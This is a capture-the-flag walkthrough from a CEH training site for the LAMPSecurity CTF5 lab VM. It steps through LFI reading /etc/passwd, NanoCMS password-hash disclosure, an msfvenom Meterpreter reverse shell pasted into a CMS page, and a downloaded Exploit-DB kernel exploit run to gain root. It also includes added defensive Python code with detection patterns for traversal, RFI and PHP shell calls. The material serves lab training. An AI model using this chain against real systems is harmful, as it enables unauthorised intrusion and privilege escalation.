CEH Practice (LFI/RFI) Hack the LAMPSecurity CTF 5

This is a walkthrough from HA; we are only concerned with the opening part, which the Instructor presents in the video. Please refer to the later parts on your own for further study.

CEH v11 ANSI training program

Today we are going to take on another CTF challenge, LAMPSecurity CTF5. It is another boot2root challenge provided for practice, and its difficulty level is suited to beginners. So let’s try to break through it. Before starting, note that you can download it from here: https://www.vulnhub.com/entry/lampsecurity-ctf5,84/

Penetration Methodology

  • Network Scanning (Nmap, netdiscover)
  • HTTP service enumeration
  • Identifying exploit for the vulnerable CMS Web application
  • Access CMS admin login page & credentials
  • Generate PHP Backdoor (Msfvenom)
  • Upload and execute the backdoor
  • Reverse connection (Metasploit)
  • Import python one-liner for proper TTY shell
  • Exploiting target (exploit 9479)
  • Get the Root access


Let’s start off with scanning the network to find our target.

We found our target –>

Our next step is to scan our target with NMAP.

nmap -sV -p-

The NMAP output shows us that there are multiple ports opened. As HTTP service is also running, let’s begin with the same first and see what information we get.

Browsing to the URL, we were greeted with a “Phake Organization” heading banner and many options to navigate further.

Let’s run Nikto tool here to find out more information

nikto -h

As we can see, the victim machine is prone to an LFI/RFI vulnerability.

Now we will paste this malicious code (as highlighted above) into the URL as follows, exploiting the LFI vulnerability from the browser.

As we can see from the output above, we have successfully retrieved the contents of /etc/passwd in the browser. We may use this content later in the lab (if required).

Click on the Blog tab of the website and it will redirect us to the URL

We got a clue from Andy Carp’s blog that the site is powered by NanoCMS. NanoCMS is a lightweight PHP-based CMS that is now discontinued. We therefore searched the internet for known vulnerabilities in NanoCMS and found the details at the following URL: https://www.securityfocus.com/bid/34508/exploit

The vulnerability identified is a Password Hash Information Disclosure, which allows unrestricted access to the path /data/pagesdata.txt.

Let’s append /data/pagesdata.txt to the site URL and navigate to it. The following content will be shown, which contains a lot of information. Upon further investigation we found that the admin password hash is disclosed in it.
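From the defender's side, both findings above (traversal in a page parameter, and a direct fetch of NanoCMS's /data/pagesdata.txt) leave a clear trace in the web server's access log. The following is an added example, not code from the original post, that classifies constructed Apache-style log lines; the client addresses, timestamps and the 203.0.113.7 host are made up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access-log lines (not from the original post); the
# client addresses, timestamps and the 203.0.113.7 host are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2023:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2023:10:01:07 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [12/Mar/2023:10:01:09 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1843
10.0.0.9 - - [12/Mar/2023:10:01:15 +0000] "GET /index.php?page=http://203.0.113.7/x.txt HTTP/1.1" 200 77
10.0.0.9 - - [12/Mar/2023:10:02:30 +0000] "GET /data/pagesdata.txt HTTP/1.1" 200 2048
10.0.0.5 - - [12/Mar/2023:10:03:00 +0000] "GET /admin/ HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)')
TRAVERSAL = re.compile(r"\.\.[/\\]")
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")

def classify_request(line):
    """Return (client_ip, finding) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target = m.group("ip"), m.group("target")
    parts = urlsplit(target)
    # NanoCMS keeps page data (including the admin hash) in this world-readable file.
    if parts.path.lower().endswith("/data/pagesdata.txt"):
        return ip, "nanocms-hash-disclosure"
    # parse_qsl decodes once; decode again to catch double-encoded traversal.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)
        if REMOTE_SCHEME.match(value):
            return ip, "rfi"
        if TRAVERSAL.search(value) or "\x00" in value or any(f in value for f in SENSITIVE_FILES):
            return ip, "lfi"
    return None

def scan_log(text):
    """Collect every finding in the log as a list of (client_ip, finding)."""
    findings = []
    for line in text.splitlines():
        hit = classify_request(line)
        if hit:
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{finding}")
```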

Open the website http://www.hashkiller.co.uk and decode the MD5 password hash received from above.

As seen in the output, “shannon” is the password recovered for the user admin.

Navigate to URL

Click on the Admin login sub-heading under the Login and we will be redirected to

Input the credentials in the Admin login page as follows :

Username: admin
Password : shannon

Upon success, the following page will appear

Click on the New Page option, where we should be able to add new content containing our own PHP code.

Let’s generate a reverse PHP shell with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

Copy the code from <?php to die() as shown above. Open the NanoCMS admin panel of the website, navigate to the New Page option and paste the reverse PHP shell into the Content section. Enter any name as the Title and click on Add Page.

After clicking Add Page, the file “shell” has been uploaded successfully, as seen in the screenshot below (under Navigation).

Now, in parallel, open the Metasploit console and run the following:

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Once the listener is running on Kali Linux, click on the shell page in Andy Carp’s blog. As soon as we click it, we get a Meterpreter console; in the image below we can observe Meterpreter session 1. But our task is not finished yet: we still need to go further for privilege escalation.
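The page-creation step above is the control point a CMS should defend: a page body is data, not code. The following is an added example, not NanoCMS's own code or code from the original post, that inspects submitted page bodies for PHP open tags and socket/command calls, and shows the hardened alternative of storing the body as escaped text so it can never be executed when served. The submissions are constructed, and the "shell" entry only imitates the shape of a reverse-connect stub.

```python
import html
import re

# Constructed sample page submissions (not from the original post). The "shell"
# entry only imitates the shape of a PHP reverse-connect stub; it is not a payload.
SUBMISSIONS = {
    "about": "<h1>Phake Organization</h1><p>Welcome to our site.</p>",
    "shell": "<?php $ip = '192.0.2.10'; $port = 4444; $s = fsockopen($ip, $port); /* ... */ die(); ?>",
    "tutorial": "<pre>&lt;?php echo 'hello'; ?&gt;</pre>",
}

# A PHP open tag, and calls a page body never needs. Calls are matched as an
# identifier followed by '(' so prose that merely mentions the word is not flagged.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.I)
DANGEROUS_CALLS = re.compile(
    r"\b(fsockopen|stream_socket_client|socket_create|eval|system|exec|"
    r"shell_exec|passthru|popen|proc_open|base64_decode)\s*\(", re.I)

def inspect_page(content):
    """Return the indicator names found in one page body (empty list if clean)."""
    found = []
    if PHP_OPEN_TAG.search(content):
        found.append("php-open-tag")
    found.extend(sorted({m.group(1).lower() for m in DANGEROUS_CALLS.finditer(content)}))
    return found

def review_submissions(pages):
    """Map title -> indicators for every submission that should be rejected."""
    return {title: hits for title, hits in
            ((title, inspect_page(body)) for title, body in pages.items()) if hits}

def store_as_text(content):
    """Hardened alternative: persist the body as escaped text so a PHP tag in it
    can only ever be displayed, never executed when the page is served."""
    return html.escape(content, quote=False)

if __name__ == "__main__":
    for title, hits in review_submissions(SUBMISSIONS).items():
        print(f"rejected page {title!r}: {', '.join(hits)}")
```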

Using the sysinfo command, we found the machine's architecture and kernel details, which may help us find a kernel exploit for privilege escalation.


We searched the internet for a privilege escalation exploit that might apply to this Linux kernel version and found the link below (as shown in the image above).


Since that kernel version is known to be vulnerable, we download its exploit to the Kali machine from the Exploit-DB website, as shown below:

wget https://www.exploit-db.com/download/9479.c

Moving forward, we will compile the file as follows:

gcc -m32 -o exploit 9479.c

Now go back to the Meterpreter session and navigate to the /tmp folder:

cd /tmp

Upload the exploit file from the Kali machine to the target system through the Meterpreter session:

upload /root/exploit exploit

Next, drop into a system shell with the shell command.


In order to get a proper TTY shell, we spawned one with the following Python one-liner:

python -c 'import pty;pty.spawn("/bin/bash")'

We got a limited shell! Now let’s enumerate further.

Proceed to the tmp folder by typing:

cd /tmp

Let’s list what it contains; for that, type:


Make the exploit executable before running it:

chmod 777 exploit

Then run the following command to execute the exploit:

env- ./exploit

As soon as the exploit executes, we get root access!

To confirm this, type:


Hurray! We have successfully solved this challenge.

Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing.

1 comment on “CEH Practice (LFI/RFI) Hack the LAMPSecurity CTF 5”

  1. CEHack penetration testing in PwnLab (CTF challenge) – CEH – CHFI – ECSA – CPENT – LPT – PENTEST+ CySA+ SECURITY+ Training

    […] So, when we opened the target IP in the browser and explored the Login tab, we saw that it presents a login form as shown in the image below. Since we do not know its login credentials, we tried SQL injection techniques, but nothing has been useful so far, and the last option is to use CURL. If you observe the URL, you may believe that it looks like LFI. […]

